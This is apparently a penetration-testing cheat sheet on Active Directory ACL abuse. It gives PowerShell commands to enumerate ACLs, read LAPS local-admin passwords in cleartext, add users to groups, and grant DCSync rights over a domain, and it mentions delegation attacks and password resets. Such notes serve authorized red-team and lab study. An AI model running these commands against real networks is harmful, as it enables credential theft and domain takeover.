ACL Abuse
Enumeration
# Import
Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\ADModule\ActiveDirectory\ActiveDirectory.psd1
# Get DistinguishedName
Get-ADUser -Identity USER
# Find ACLs related to that user
(Get-Acl 'AD:\CN=USER,CN=Users,DC=it,DC=gcb,DC=local').Access
ReadProperty, ExtendedRight over OU / Computer Object
Most likely LAPS. The IdentityReferenceName can read the LAPS password in cleartext for the OU.
# Import module
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1
# Find the OUs that can read LAPS passwords
Find-AdmPwdExtendedRights -Identity <OU>
# Once we have compromised a user that can read LAPS
Get-AdmPwdPassword -ComputerName <targetmachine>
WriteProperty | Self-Membership | GenericAll over Group
Can add members to the group
# Add
Add-ADGroupMember -Identity "LocalAdmins" -Members USERS
# Check
Get-ADGroupMember -Identity "LocalAdmins"
GenericWrite | GenericAll | WriteProperty over Computer Object
Can perform Resource Based Constrained Delegation Attack
GenericAll over User Object
Can reset their password without knowing the old one
WriteDACL over DC
Can give DCSync privs to user
Set-ADACL -SamAccountName USER\DOMAIN DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose
Resources
Last updated
Was this helpful?